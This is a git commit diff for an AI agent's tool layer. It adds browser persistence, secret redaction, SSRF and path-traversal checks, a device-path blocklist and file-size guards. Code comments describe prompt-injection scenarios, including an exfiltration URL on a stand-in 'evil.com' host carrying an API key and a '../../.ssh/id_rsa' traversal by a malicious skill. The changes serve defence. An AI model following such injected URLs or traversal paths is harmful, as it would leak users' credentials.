Merge branch 'main' into rewbs/tool-use-charge-to-subscription

This commit is contained in:
Ben Barclay 2026-04-02 11:00:35 +11:00
commit a2e56d044b
175 changed files with 18848 additions and 3772 deletions

View file

@ -15,7 +15,7 @@ Setup::
npm install && npm start # downloads Camoufox (~300MB) on first run
# Option 2: Docker
docker run -p 9377:9377 jo-inc/camofox-browser
docker run -p 9377:9377 -e CAMOFOX_PORT=9377 jo-inc/camofox-browser
Then set ``CAMOFOX_URL=http://localhost:9377`` in ``~/.hermes/.env``.
"""
@ -34,6 +34,9 @@ from typing import Any, Dict, Optional
import requests
from hermes_cli.config import load_config
from tools.browser_camofox_state import get_camofox_identity
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
@ -42,6 +45,8 @@ logger = logging.getLogger(__name__)
_DEFAULT_TIMEOUT = 30 # seconds per HTTP request
_SNAPSHOT_MAX_CHARS = 80_000 # camofox paginates at this limit
_vnc_url: Optional[str] = None # cached from /health response
_vnc_url_checked = False # only probe once per process
def get_camofox_url() -> str:
@ -56,16 +61,52 @@ def is_camofox_mode() -> bool:
def check_camofox_available() -> bool:
"""Verify the Camofox server is reachable."""
global _vnc_url, _vnc_url_checked
url = get_camofox_url()
if not url:
return False
try:
resp = requests.get(f"{url}/health", timeout=5)
if resp.status_code == 200 and not _vnc_url_checked:
try:
data = resp.json()
vnc_port = data.get("vncPort")
if isinstance(vnc_port, int) and 1 <= vnc_port <= 65535:
from urllib.parse import urlparse
parsed = urlparse(url)
host = parsed.hostname or "localhost"
_vnc_url = f"http://{host}:{vnc_port}"
except (ValueError, KeyError):
pass
_vnc_url_checked = True
return resp.status_code == 200
except Exception:
return False
def get_vnc_url() -> Optional[str]:
"""Return the VNC URL if the Camofox server exposes one, or None."""
if not _vnc_url_checked:
check_camofox_available()
return _vnc_url
def _managed_persistence_enabled() -> bool:
"""Return whether Hermes-managed persistence is enabled for Camofox.
When enabled, sessions use a stable profile-scoped userId so the
Camofox server can map it to a persistent browser profile directory.
When disabled (default), each session gets a random userId (ephemeral).
Controlled by ``browser.camofox.managed_persistence`` in config.yaml.
"""
try:
camofox_cfg = load_config().get("browser", {}).get("camofox", {})
except Exception:
return False
return bool(camofox_cfg.get("managed_persistence"))
# ---------------------------------------------------------------------------
# Session management
# ---------------------------------------------------------------------------
@ -75,16 +116,31 @@ _sessions_lock = threading.Lock()
def _get_session(task_id: Optional[str]) -> Dict[str, Any]:
"""Get or create a camofox session for the given task."""
"""Get or create a camofox session for the given task.
When managed persistence is enabled, uses a deterministic userId
derived from the Hermes profile so the Camofox server can map it
to the same persistent browser profile across restarts.
"""
task_id = task_id or "default"
with _sessions_lock:
if task_id in _sessions:
return _sessions[task_id]
session = {
"user_id": f"hermes_{uuid.uuid4().hex[:10]}",
"tab_id": None,
"session_key": f"task_{task_id[:16]}",
}
if _managed_persistence_enabled():
identity = get_camofox_identity(task_id)
session = {
"user_id": identity["user_id"],
"tab_id": None,
"session_key": identity["session_key"],
"managed": True,
}
else:
session = {
"user_id": f"hermes_{uuid.uuid4().hex[:10]}",
"tab_id": None,
"session_key": f"task_{task_id[:16]}",
"managed": False,
}
_sessions[task_id] = session
return session
@ -172,11 +228,19 @@ def camofox_navigate(url: str, task_id: Optional[str] = None) -> str:
{"userId": session["user_id"], "url": url},
timeout=60,
)
return json.dumps({
result = {
"success": True,
"url": data.get("url", url),
"title": data.get("title", ""),
})
}
vnc = get_vnc_url()
if vnc:
result["vnc_url"] = vnc
result["vnc_hint"] = (
"Browser is visible via VNC. "
"Share this link with the user so they can watch the browser live."
)
return json.dumps(result)
except requests.HTTPError as e:
return json.dumps({"success": False, "error": f"Navigation failed: {e}"})
except requests.ConnectionError:
@ -184,7 +248,7 @@ def camofox_navigate(url: str, task_id: Optional[str] = None) -> str:
"success": False,
"error": f"Cannot connect to Camofox at {get_camofox_url()}. "
"Is the server running? Start with: npm start (in camofox-browser dir) "
"or: docker run -p 9377:9377 jo-inc/camofox-browser",
"or: docker run -p 9377:9377 -e CAMOFOX_PORT=9377 jo-inc/camofox-browser",
})
except Exception as e:
return json.dumps({"success": False, "error": str(e)})
@ -421,6 +485,12 @@ def camofox_vision(question: str, annotate: bool = False,
except Exception:
pass
# Redact secrets from annotation context before sending to vision LLM.
# The screenshot image itself cannot be redacted, but at least the
# text-based accessibility tree snippet won't leak secret values.
from agent.redact import redact_sensitive_text
annotation_context = redact_sensitive_text(annotation_context)
# Send to vision LLM
from agent.auxiliary_client import call_llm
@ -436,7 +506,7 @@ def camofox_vision(question: str, annotate: bool = False,
except Exception:
_vision_timeout = 120
analysis = call_llm(
response = call_llm(
messages=[{
"role": "user",
"content": [
@ -452,6 +522,11 @@ def camofox_vision(question: str, annotate: bool = False,
task="vision",
timeout=_vision_timeout,
)
analysis = (response.choices[0].message.content or "").strip() if response.choices else ""
# Redact secrets the vision LLM may have read from the screenshot.
from agent.redact import redact_sensitive_text
analysis = redact_sensitive_text(analysis)
return json.dumps({
"success": True,

View file

@ -0,0 +1,47 @@
"""Hermes-managed Camofox state helpers.
Provides profile-scoped identity and state directory paths for Camofox
persistent browser profiles. When managed persistence is enabled, Hermes
sends a deterministic userId derived from the active profile so that
Camofox can map it to the same persistent browser profile directory
across restarts.
"""
from __future__ import annotations
import uuid
from pathlib import Path
from typing import Dict, Optional
from hermes_constants import get_hermes_home
CAMOFOX_STATE_DIR_NAME = "browser_auth"
CAMOFOX_STATE_SUBDIR = "camofox"
def get_camofox_state_dir() -> Path:
"""Return the profile-scoped root directory for Camofox persistence."""
return get_hermes_home() / CAMOFOX_STATE_DIR_NAME / CAMOFOX_STATE_SUBDIR
def get_camofox_identity(task_id: Optional[str] = None) -> Dict[str, str]:
"""Return the stable Hermes-managed Camofox identity for this profile.
The user identity is profile-scoped (same Hermes profile = same userId).
The session key is scoped to the logical browser task so newly created
tabs within the same profile reuse the same identity contract.
"""
scope_root = str(get_camofox_state_dir())
logical_scope = task_id or "default"
user_digest = uuid.uuid5(
uuid.NAMESPACE_URL,
f"camofox-user:{scope_root}",
).hex[:10]
session_digest = uuid.uuid5(
uuid.NAMESPACE_URL,
f"camofox-session:{scope_root}:{logical_scope}",
).hex[:16]
return {
"user_id": f"hermes_{user_digest}",
"session_key": f"task_{session_digest}",
}

View file

@ -238,6 +238,8 @@ _PROVIDER_REGISTRY: Dict[str, type] = {
_cached_cloud_provider: Optional[CloudBrowserProvider] = None
_cloud_provider_resolved = False
_allow_private_urls_resolved = False
_cached_allow_private_urls: Optional[bool] = None
def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
@ -299,6 +301,44 @@ def _is_local_mode() -> bool:
return _get_cloud_provider() is None
def _is_local_backend() -> bool:
"""Return True when the browser runs locally (no cloud provider).
SSRF protection is only meaningful for cloud backends (Browserbase,
BrowserUse) where the agent could reach internal resources on a remote
machine. For local backends Camofox, or the built-in headless
Chromium without a cloud provider the user already has full terminal
and network access on the same machine, so the check adds no security
value.
"""
return _is_camofox_mode() or _get_cloud_provider() is None
def _allow_private_urls() -> bool:
"""Return whether the browser is allowed to navigate to private/internal addresses.
Reads ``config["browser"]["allow_private_urls"]`` once and caches the result
for the process lifetime. Defaults to ``False`` (SSRF protection active).
"""
global _cached_allow_private_urls, _allow_private_urls_resolved
if _allow_private_urls_resolved:
return _cached_allow_private_urls
_allow_private_urls_resolved = True
_cached_allow_private_urls = False # safe default
try:
hermes_home = Path(os.environ.get("HERMES_HOME", Path.home() / ".hermes"))
config_path = hermes_home / "config.yaml"
if config_path.exists():
import yaml
with open(config_path) as f:
cfg = yaml.safe_load(f) or {}
_cached_allow_private_urls = bool(cfg.get("browser", {}).get("allow_private_urls"))
except Exception as e:
logger.debug("Could not read allow_private_urls from config: %s", e)
return _cached_allow_private_urls
def _socket_safe_tmpdir() -> str:
"""Return a short temp directory path suitable for Unix domain sockets.
@ -1024,6 +1064,13 @@ def _extract_relevant_content(
f"Provide a concise summary focused on interactive elements and key content."
)
# Redact secrets from snapshot before sending to auxiliary LLM.
# Without this, a page displaying env vars or API keys would leak
# secrets to the extraction model before run_agent.py's general
# redaction layer ever sees the tool result.
from agent.redact import redact_sensitive_text
extraction_prompt = redact_sensitive_text(extraction_prompt)
try:
call_kwargs = {
"task": "web_extract",
@ -1035,7 +1082,9 @@ def _extract_relevant_content(
if model:
call_kwargs["model"] = model
response = call_llm(**call_kwargs)
return (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
extracted = (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
# Redact any secrets the auxiliary LLM may have echoed back.
return redact_sensitive_text(extracted)
except Exception:
return _truncate_snapshot(snapshot_text)
@ -1072,8 +1121,23 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
Returns:
JSON string with navigation result (includes stealth features info on first nav)
"""
# SSRF protection — block private/internal addresses before navigating
if not _is_safe_url(url):
# Secret exfiltration protection — block URLs that embed API keys or
# tokens in query parameters. A prompt injection could trick the agent
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
from agent.redact import _PREFIX_RE
if _PREFIX_RE.search(url):
return json.dumps({
"success": False,
"error": "Blocked: URL contains what appears to be an API key or token. "
"Secrets must not be sent in URLs.",
})
# SSRF protection — block private/internal addresses before navigating.
# Skipped for local backends (Camofox, headless Chromium without a cloud
# provider) because the agent already has full local network access via
# the terminal tool. Can also be opted out for cloud mode via
# ``browser.allow_private_urls`` in config.
if not _is_local_backend() and not _allow_private_urls() and not _is_safe_url(url):
return json.dumps({
"success": False,
"error": "Blocked: URL targets a private or internal address",
@ -1115,7 +1179,8 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
# Post-redirect SSRF check — if the browser followed a redirect to a
# private/internal address, block the result so the model can't read
# internal content via subsequent browser_snapshot calls.
if final_url and final_url != url and not _is_safe_url(final_url):
# Skipped for local backends (same rationale as the pre-nav check).
if not _is_local_backend() and not _allow_private_urls() and final_url and final_url != url and not _is_safe_url(final_url):
# Navigate away to a blank page to prevent snapshot leaks
_run_browser_command(effective_task_id, "open", ["about:blank"], timeout=10)
return json.dumps({
@ -1711,6 +1776,9 @@ def browser_vision(question: str, annotate: bool = False, task_id: Optional[str]
response = call_llm(**call_kwargs)
analysis = (response.choices[0].message.content or "").strip()
# Redact secrets the vision LLM may have read from the screenshot.
from agent.redact import redact_sensitive_text
analysis = redact_sensitive_text(analysis)
response_data = {
"success": True,
"analysis": analysis or "Vision analysis returned no content.",

View file

@ -596,6 +596,14 @@ def execute_code(
stdout_text = strip_ansi(stdout_text)
stderr_text = strip_ansi(stderr_text)
# Redact secrets (API keys, tokens, etc.) from sandbox output.
# The sandbox env-var filter (lines 434-454) blocks os.environ access,
# but scripts can still read secrets from disk (e.g. open('~/.hermes/.env')).
# This ensures leaked secrets never enter the model context.
from agent.redact import redact_sensitive_text
stdout_text = redact_sensitive_text(stdout_text)
stderr_text = redact_sensitive_text(stderr_text)
# Build response
result: Dict[str, Any] = {
"status": status,

View file

@ -55,16 +55,47 @@ def register_credential_file(
*relative_path* is relative to ``HERMES_HOME`` (e.g. ``google_token.json``).
Returns True if the file exists on the host and was registered.
Security: rejects absolute paths and path traversal sequences (``..``).
The resolved host path must remain inside HERMES_HOME so that a malicious
skill cannot declare ``required_credential_files: ['../../.ssh/id_rsa']``
and exfiltrate sensitive host files into a container sandbox.
"""
hermes_home = _resolve_hermes_home()
# Reject absolute paths — they bypass the HERMES_HOME sandbox entirely.
if os.path.isabs(relative_path):
logger.warning(
"credential_files: rejected absolute path %r (must be relative to HERMES_HOME)",
relative_path,
)
return False
host_path = hermes_home / relative_path
if not host_path.is_file():
logger.debug("credential_files: skipping %s (not found)", host_path)
# Resolve symlinks and normalise ``..`` before the containment check so
# that traversal like ``../. ssh/id_rsa`` cannot escape HERMES_HOME.
try:
resolved = host_path.resolve()
hermes_home_resolved = hermes_home.resolve()
resolved.relative_to(hermes_home_resolved) # raises ValueError if outside
except ValueError:
logger.warning(
"credential_files: rejected path traversal %r "
"(resolves to %s, outside HERMES_HOME %s)",
relative_path,
resolved,
hermes_home_resolved,
)
return False
if not resolved.is_file():
logger.debug("credential_files: skipping %s (not found)", resolved)
return False
container_path = f"{container_base.rstrip('/')}/{relative_path}"
_registered_files[container_path] = str(host_path)
logger.debug("credential_files: registered %s -> %s", host_path, container_path)
_registered_files[container_path] = str(resolved)
logger.debug("credential_files: registered %s -> %s", resolved, container_path)
return True
@ -110,11 +141,27 @@ def _load_config_files() -> List[Dict[str, str]]:
cfg = yaml.safe_load(f) or {}
cred_files = cfg.get("terminal", {}).get("credential_files")
if isinstance(cred_files, list):
hermes_home_resolved = hermes_home.resolve()
for item in cred_files:
if isinstance(item, str) and item.strip():
host_path = hermes_home / item.strip()
rel = item.strip()
if os.path.isabs(rel):
logger.warning(
"credential_files: rejected absolute config path %r", rel,
)
continue
host_path = (hermes_home / rel).resolve()
try:
host_path.relative_to(hermes_home_resolved)
except ValueError:
logger.warning(
"credential_files: rejected config path traversal %r "
"(resolves to %s, outside HERMES_HOME %s)",
rel, host_path, hermes_home_resolved,
)
continue
if host_path.is_file():
container_path = f"/root/.hermes/{item.strip()}"
container_path = f"/root/.hermes/{rel}"
result.append({
"host_path": str(host_path),
"container_path": container_path,

View file

@ -71,6 +71,9 @@ WRITE_DENIED_PREFIXES = [
os.path.join(_HOME, ".kube"),
"/etc/sudoers.d",
"/etc/systemd",
os.path.join(_HOME, ".docker"),
os.path.join(_HOME, ".azure"),
os.path.join(_HOME, ".config", "gh"),
]
]

View file

@ -15,6 +15,80 @@ logger = logging.getLogger(__name__)
_EXPECTED_WRITE_ERRNOS = {errno.EACCES, errno.EPERM, errno.EROFS}
# ---------------------------------------------------------------------------
# Read-size guard: cap the character count returned to the model.
# We're model-agnostic so we can't count tokens; characters are a safe proxy.
# 100K chars ≈ 2535K tokens across typical tokenisers. Files larger than
# this in a single read are a context-window hazard — the model should use
# offset+limit to read the relevant section.
#
# Configurable via config.yaml: file_read_max_chars: 200000
# ---------------------------------------------------------------------------
_DEFAULT_MAX_READ_CHARS = 100_000
_max_read_chars_cached: int | None = None
def _get_max_read_chars() -> int:
"""Return the configured max characters per file read.
Reads ``file_read_max_chars`` from config.yaml on first call, caches
the result for the lifetime of the process. Falls back to the
built-in default if the config is missing or invalid.
"""
global _max_read_chars_cached
if _max_read_chars_cached is not None:
return _max_read_chars_cached
try:
from hermes_cli.config import load_config
cfg = load_config()
val = cfg.get("file_read_max_chars")
if isinstance(val, (int, float)) and val > 0:
_max_read_chars_cached = int(val)
return _max_read_chars_cached
except Exception:
pass
_max_read_chars_cached = _DEFAULT_MAX_READ_CHARS
return _max_read_chars_cached
# If the total file size exceeds this AND the caller didn't specify a narrow
# range (limit <= 200), we include a hint encouraging targeted reads.
_LARGE_FILE_HINT_BYTES = 512_000 # 512 KB
# ---------------------------------------------------------------------------
# Device path blocklist — reading these hangs the process (infinite output
# or blocking on input). Checked by path only (no I/O).
# ---------------------------------------------------------------------------
_BLOCKED_DEVICE_PATHS = frozenset({
# Infinite output — never reach EOF
"/dev/zero", "/dev/random", "/dev/urandom", "/dev/full",
# Blocks waiting for input
"/dev/stdin", "/dev/tty", "/dev/console",
# Nonsensical to read
"/dev/stdout", "/dev/stderr",
# fd aliases
"/dev/fd/0", "/dev/fd/1", "/dev/fd/2",
})
def _is_blocked_device(filepath: str) -> bool:
"""Return True if the path would hang the process (infinite output or blocking input).
Uses the *literal* path no symlink resolution because the model
specifies paths directly and realpath follows symlinks all the way
through (e.g. /dev/stdin /proc/self/fd/0 /dev/pts/0), defeating
the check.
"""
normalized = os.path.expanduser(filepath)
if normalized in _BLOCKED_DEVICE_PATHS:
return True
# /proc/self/fd/0-2 and /proc/<pid>/fd/0-2 are Linux aliases for stdio
if normalized.startswith("/proc/") and normalized.endswith(
("/fd/0", "/fd/1", "/fd/2")
):
return True
return False
# Paths that file tools should refuse to write to without going through the
# terminal tool's approval system. These match prefixes after os.path.realpath.
_SENSITIVE_PATH_PREFIXES = ("/etc/", "/boot/", "/usr/lib/systemd/")
@ -53,11 +127,21 @@ def _is_expected_write_exception(exc: Exception) -> bool:
_file_ops_lock = threading.Lock()
_file_ops_cache: dict = {}
# Track files read per task to detect re-read loops after context compression.
# Track files read per task to detect re-read loops and deduplicate reads.
# Per task_id we store:
# "last_key": the key of the most recent read/search call (or None)
# "consecutive": how many times that exact call has been repeated in a row
# "read_history": set of (path, offset, limit) tuples for get_read_files_summary
# "dedup": dict mapping (resolved_path, offset, limit) → mtime float
# Used to skip re-reads of unchanged files. Reset on
# context compression (the original content is summarised
# away so the model needs the full content again).
# "read_timestamps": dict mapping resolved_path → modification-time float
# recorded when the file was last read (or written) by
# this task. Used by write_file and patch to detect
# external changes between the agent's read and write.
# Updated after successful writes so consecutive edits
# by the same task don't trigger false warnings.
_read_tracker_lock = threading.Lock()
_read_tracker: dict = {}
@ -195,8 +279,19 @@ def clear_file_ops_cache(task_id: str = None):
def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str = "default") -> str:
"""Read a file with pagination and line numbers."""
try:
# Security: block direct reads of internal Hermes cache/index files
# to prevent prompt injection via catalog or hub metadata files.
# ── Device path guard ─────────────────────────────────────────
# Block paths that would hang the process (infinite output,
# blocking on input). Pure path check — no I/O.
if _is_blocked_device(path):
return json.dumps({
"error": (
f"Cannot read '{path}': this is a device file that would "
"block or produce infinite output."
),
})
# ── Hermes internal path guard ────────────────────────────────
# Prevent prompt injection via catalog or hub metadata files.
import pathlib as _pathlib
from hermes_constants import get_hermes_home as _get_hh
_resolved = _pathlib.Path(path).expanduser().resolve()
@ -217,20 +312,83 @@ def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str =
})
except ValueError:
pass
# ── Dedup check ───────────────────────────────────────────────
# If we already read this exact (path, offset, limit) and the
# file hasn't been modified since, return a lightweight stub
# instead of re-sending the same content. Saves context tokens.
resolved_str = str(_resolved)
dedup_key = (resolved_str, offset, limit)
with _read_tracker_lock:
task_data = _read_tracker.setdefault(task_id, {
"last_key": None, "consecutive": 0,
"read_history": set(), "dedup": {},
})
cached_mtime = task_data.get("dedup", {}).get(dedup_key)
if cached_mtime is not None:
try:
current_mtime = os.path.getmtime(resolved_str)
if current_mtime == cached_mtime:
return json.dumps({
"content": (
"File unchanged since last read. The content from "
"the earlier read_file result in this conversation is "
"still current — refer to that instead of re-reading."
),
"path": path,
"dedup": True,
}, ensure_ascii=False)
except OSError:
pass # stat failed — fall through to full read
# ── Perform the read ──────────────────────────────────────────
file_ops = _get_file_ops(task_id)
result = file_ops.read_file(path, offset, limit)
if result.content:
result.content = redact_sensitive_text(result.content)
result_dict = result.to_dict()
# Track reads to detect *consecutive* re-read loops.
# The counter resets whenever any other tool is called in between,
# so only truly back-to-back identical reads trigger warnings/blocks.
# ── Character-count guard ─────────────────────────────────────
# We're model-agnostic so we can't count tokens; characters are
# the best proxy we have. If the read produced an unreasonable
# amount of content, reject it and tell the model to narrow down.
# Note: we check the formatted content (with line-number prefixes),
# not the raw file size, because that's what actually enters context.
content_len = len(result.content or "")
file_size = result_dict.get("file_size", 0)
max_chars = _get_max_read_chars()
if content_len > max_chars:
total_lines = result_dict.get("total_lines", "unknown")
return json.dumps({
"error": (
f"Read produced {content_len:,} characters which exceeds "
f"the safety limit ({max_chars:,} chars). "
"Use offset and limit to read a smaller range. "
f"The file has {total_lines} lines total."
),
"path": path,
"total_lines": total_lines,
"file_size": file_size,
}, ensure_ascii=False)
# Large-file hint: if the file is big and the caller didn't ask
# for a narrow window, nudge toward targeted reads.
if (file_size and file_size > _LARGE_FILE_HINT_BYTES
and limit > 200
and result_dict.get("truncated")):
result_dict.setdefault("_hint", (
f"This file is large ({file_size:,} bytes). "
"Consider reading only the section you need with offset and limit "
"to keep context usage efficient."
))
# ── Track for consecutive-loop detection ──────────────────────
read_key = ("read", path, offset, limit)
with _read_tracker_lock:
task_data = _read_tracker.setdefault(task_id, {
"last_key": None, "consecutive": 0, "read_history": set(),
})
# Ensure "dedup" key exists (backward compat with old tracker state)
if "dedup" not in task_data:
task_data["dedup"] = {}
task_data["read_history"].add((path, offset, limit))
if task_data["last_key"] == read_key:
task_data["consecutive"] += 1
@ -239,6 +397,17 @@ def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str =
task_data["consecutive"] = 1
count = task_data["consecutive"]
# Store mtime at read time for two purposes:
# 1. Dedup: skip identical re-reads of unchanged files.
# 2. Staleness: warn on write/patch if the file changed since
# the agent last read it (external edit, concurrent agent, etc.).
try:
_mtime_now = os.path.getmtime(resolved_str)
task_data["dedup"][dedup_key] = _mtime_now
task_data.setdefault("read_timestamps", {})[resolved_str] = _mtime_now
except OSError:
pass # Can't stat — skip tracking for this entry
if count >= 4:
# Hard block: stop returning content to break the loop
return json.dumps({
@ -296,6 +465,28 @@ def clear_read_tracker(task_id: str = None):
_read_tracker.clear()
def reset_file_dedup(task_id: str = None):
"""Clear the deduplication cache for file reads.
Called after context compression the original read content has been
summarised away, so the model needs the full content if it reads the
same file again. Without this, reads after compression would return
a "file unchanged" stub pointing at content that no longer exists in
context.
Call with a task_id to clear just that task, or without to clear all.
"""
with _read_tracker_lock:
if task_id:
task_data = _read_tracker.get(task_id)
if task_data and "dedup" in task_data:
task_data["dedup"].clear()
else:
for task_data in _read_tracker.values():
if "dedup" in task_data:
task_data["dedup"].clear()
def notify_other_tool_call(task_id: str = "default"):
"""Reset consecutive read/search counter for a task.
@ -312,15 +503,71 @@ def notify_other_tool_call(task_id: str = "default"):
task_data["consecutive"] = 0
def _update_read_timestamp(filepath: str, task_id: str) -> None:
"""Record the file's current modification time after a successful write.
Called after write_file and patch so that consecutive edits by the
same task don't trigger false staleness warnings — each write
refreshes the stored timestamp to match the file's new state.
"""
try:
resolved = str(Path(filepath).expanduser().resolve())
current_mtime = os.path.getmtime(resolved)
except (OSError, ValueError):
return
with _read_tracker_lock:
task_data = _read_tracker.get(task_id)
if task_data is not None:
task_data.setdefault("read_timestamps", {})[resolved] = current_mtime
def _check_file_staleness(filepath: str, task_id: str) -> str | None:
"""Check whether a file was modified since the agent last read it.
Returns a warning string if the file is stale (mtime changed since
the last read_file call for this task), or None if the file is fresh
or was never read. Does not block the write still proceeds.
"""
try:
resolved = str(Path(filepath).expanduser().resolve())
except (OSError, ValueError):
return None
with _read_tracker_lock:
task_data = _read_tracker.get(task_id)
if not task_data:
return None
read_mtime = task_data.get("read_timestamps", {}).get(resolved)
if read_mtime is None:
return None # File was never read — nothing to compare against
try:
current_mtime = os.path.getmtime(resolved)
except OSError:
return None # Can't stat — file may have been deleted, let write handle it
if current_mtime != read_mtime:
return (
f"Warning: {filepath} was modified since you last read it "
"(external edit or concurrent agent). The content you read may be "
"stale. Consider re-reading the file to verify before writing."
)
return None
def write_file_tool(path: str, content: str, task_id: str = "default") -> str:
"""Write content to a file."""
sensitive_err = _check_sensitive_path(path)
if sensitive_err:
return json.dumps({"error": sensitive_err}, ensure_ascii=False)
try:
stale_warning = _check_file_staleness(path, task_id)
file_ops = _get_file_ops(task_id)
result = file_ops.write_file(path, content)
return json.dumps(result.to_dict(), ensure_ascii=False)
result_dict = result.to_dict()
if stale_warning:
result_dict["_warning"] = stale_warning
# Refresh the stored timestamp so consecutive writes by this
# task don't trigger false staleness warnings.
_update_read_timestamp(path, task_id)
return json.dumps(result_dict, ensure_ascii=False)
except Exception as e:
if _is_expected_write_exception(e):
logger.debug("write_file expected denial: %s: %s", type(e).__name__, e)
@ -346,6 +593,13 @@ def patch_tool(mode: str = "replace", path: str = None, old_string: str = None,
if sensitive_err:
return json.dumps({"error": sensitive_err}, ensure_ascii=False)
try:
# Check staleness for all files this patch will touch.
stale_warnings = []
for _p in _paths_to_check:
_sw = _check_file_staleness(_p, task_id)
if _sw:
stale_warnings.append(_sw)
file_ops = _get_file_ops(task_id)
if mode == "replace":
@ -362,6 +616,13 @@ def patch_tool(mode: str = "replace", path: str = None, old_string: str = None,
return json.dumps({"error": f"Unknown mode: {mode}"})
result_dict = result.to_dict()
if stale_warnings:
result_dict["_warning"] = stale_warnings[0] if len(stale_warnings) == 1 else " | ".join(stale_warnings)
# Refresh stored timestamps for all successfully-patched paths so
# consecutive edits by this task don't trigger false warnings.
if not result_dict.get("error"):
for _p in _paths_to_check:
_update_read_timestamp(_p, task_id)
result_json = json.dumps(result_dict, ensure_ascii=False)
# Hint when old_string not found — saves iterations where the agent
# retries with stale content instead of re-reading the file.
@ -466,7 +727,7 @@ def _check_file_reqs():
READ_FILE_SCHEMA = {
"name": "read_file",
"description": "Read a text file with line numbers and pagination. Use this instead of cat/head/tail in terminal. Output format: 'LINE_NUM|CONTENT'. Suggests similar filenames if not found. Use offset and limit for large files. NOTE: Cannot read images or binary files — use vision_analyze for images.",
"description": "Read a text file with line numbers and pagination. Use this instead of cat/head/tail in terminal. Output format: 'LINE_NUM|CONTENT'. Suggests similar filenames if not found. Use offset and limit for large files. Reads exceeding ~100K characters are rejected; use offset and limit to read specific sections of large files. NOTE: Cannot read images or binary files — use vision_analyze for images.",
"parameters": {
"type": "object",
"properties": {

View file

@ -82,6 +82,8 @@ SKILLS_DIR = HERMES_HOME / "skills"
MAX_NAME_LENGTH = 64
MAX_DESCRIPTION_LENGTH = 1024
MAX_SKILL_CONTENT_CHARS = 100_000 # ~36k tokens at 2.75 chars/token
MAX_SKILL_FILE_BYTES = 1_048_576 # 1 MiB per supporting file
# Characters allowed in skill names (filesystem-safe, URL-friendly)
VALID_NAME_RE = re.compile(r'^[a-z0-9][a-z0-9._-]*$')
@ -177,6 +179,21 @@ def _validate_frontmatter(content: str) -> Optional[str]:
return None
def _validate_content_size(content: str, label: str = "SKILL.md") -> Optional[str]:
"""Check that content doesn't exceed the character limit for agent writes.
Returns an error message or None if within bounds.
"""
if len(content) > MAX_SKILL_CONTENT_CHARS:
return (
f"{label} content is {len(content):,} characters "
f"(limit: {MAX_SKILL_CONTENT_CHARS:,}). "
f"Consider splitting into a smaller SKILL.md with supporting files "
f"in references/ or templates/."
)
return None
def _resolve_skill_dir(name: str, category: str = None) -> Path:
"""Build the directory path for a new skill, optionally under a category."""
if category:
@ -275,6 +292,10 @@ def _create_skill(name: str, content: str, category: str = None) -> Dict[str, An
if err:
return {"success": False, "error": err}
err = _validate_content_size(content)
if err:
return {"success": False, "error": err}
# Check for name collisions across all directories
existing = _find_skill(name)
if existing:
@ -318,6 +339,10 @@ def _edit_skill(name: str, content: str) -> Dict[str, Any]:
if err:
return {"success": False, "error": err}
err = _validate_content_size(content)
if err:
return {"success": False, "error": err}
existing = _find_skill(name)
if not existing:
return {"success": False, "error": f"Skill '{name}' not found. Use skills_list() to see available skills."}
@ -379,27 +404,29 @@ def _patch_skill(
content = target.read_text(encoding="utf-8")
count = content.count(old_string)
if count == 0:
# Use the same fuzzy matching engine as the file patch tool.
# This handles whitespace normalization, indentation differences,
# escape sequences, and block-anchor matching — saving the agent
# from exact-match failures on minor formatting mismatches.
from tools.fuzzy_match import fuzzy_find_and_replace
new_content, match_count, match_error = fuzzy_find_and_replace(
content, old_string, new_string, replace_all
)
if match_error:
# Show a short preview of the file so the model can self-correct
preview = content[:500] + ("..." if len(content) > 500 else "")
return {
"success": False,
"error": "old_string not found in the file.",
"error": match_error,
"file_preview": preview,
}
if count > 1 and not replace_all:
return {
"success": False,
"error": (
f"old_string matched {count} times. Provide more surrounding context "
f"to make the match unique, or set replace_all=true to replace all occurrences."
),
"match_count": count,
}
new_content = content.replace(old_string, new_string) if replace_all else content.replace(old_string, new_string, 1)
# Check size limit on the result
target_label = "SKILL.md" if not file_path else file_path
err = _validate_content_size(new_content, label=target_label)
if err:
return {"success": False, "error": err}
# If patching SKILL.md, validate frontmatter is still intact
if not file_path:
@ -419,10 +446,9 @@ def _patch_skill(
_atomic_write_text(target, original_content)
return {"success": False, "error": scan_error}
replacements = count if replace_all else 1
return {
"success": True,
"message": f"Patched {'SKILL.md' if not file_path else file_path} in skill '{name}' ({replacements} replacement{'s' if replacements > 1 else ''}).",
"message": f"Patched {'SKILL.md' if not file_path else file_path} in skill '{name}' ({match_count} replacement{'s' if match_count > 1 else ''}).",
}
@ -455,6 +481,21 @@ def _write_file(name: str, file_path: str, file_content: str) -> Dict[str, Any]:
if not file_content and file_content != "":
return {"success": False, "error": "file_content is required."}
# Check size limits
content_bytes = len(file_content.encode("utf-8"))
if content_bytes > MAX_SKILL_FILE_BYTES:
return {
"success": False,
"error": (
f"File content is {content_bytes:,} bytes "
f"(limit: {MAX_SKILL_FILE_BYTES:,} bytes / 1 MiB). "
f"Consider splitting into smaller files."
),
}
err = _validate_content_size(file_content, label=file_path)
if err:
return {"success": False, "error": err}
existing = _find_skill(name)
if not existing:
return {"success": False, "error": f"Skill '{name}' not found. Create it first with action='create'."}

View file

@ -2115,7 +2115,11 @@ class OptionalSkillSource(SkillSource):
"""
def __init__(self):
self._optional_dir = Path(__file__).parent.parent / "optional-skills"
from hermes_constants import get_optional_skills_dir
self._optional_dir = get_optional_skills_dir(
Path(__file__).parent.parent / "optional-skills"
)
def source_id(self) -> str:
return "official"
@ -2521,6 +2525,22 @@ def install_from_quarantine(
if install_dir.exists():
shutil.rmtree(install_dir)
# Warn (but don't block) if SKILL.md is very large
skill_md = quarantine_path / "SKILL.md"
if skill_md.exists():
try:
skill_size = skill_md.stat().st_size
if skill_size > 100_000:
logger.warning(
"Skill '%s' has a large SKILL.md (%s chars). "
"Large skills consume significant context when loaded. "
"Consider asking the author to split it into smaller files.",
safe_skill_name,
f"{skill_size:,}",
)
except OSError:
pass
install_dir.parent.mkdir(parents=True, exist_ok=True)
shutil.move(str(quarantine_path), str(install_dir))

View file

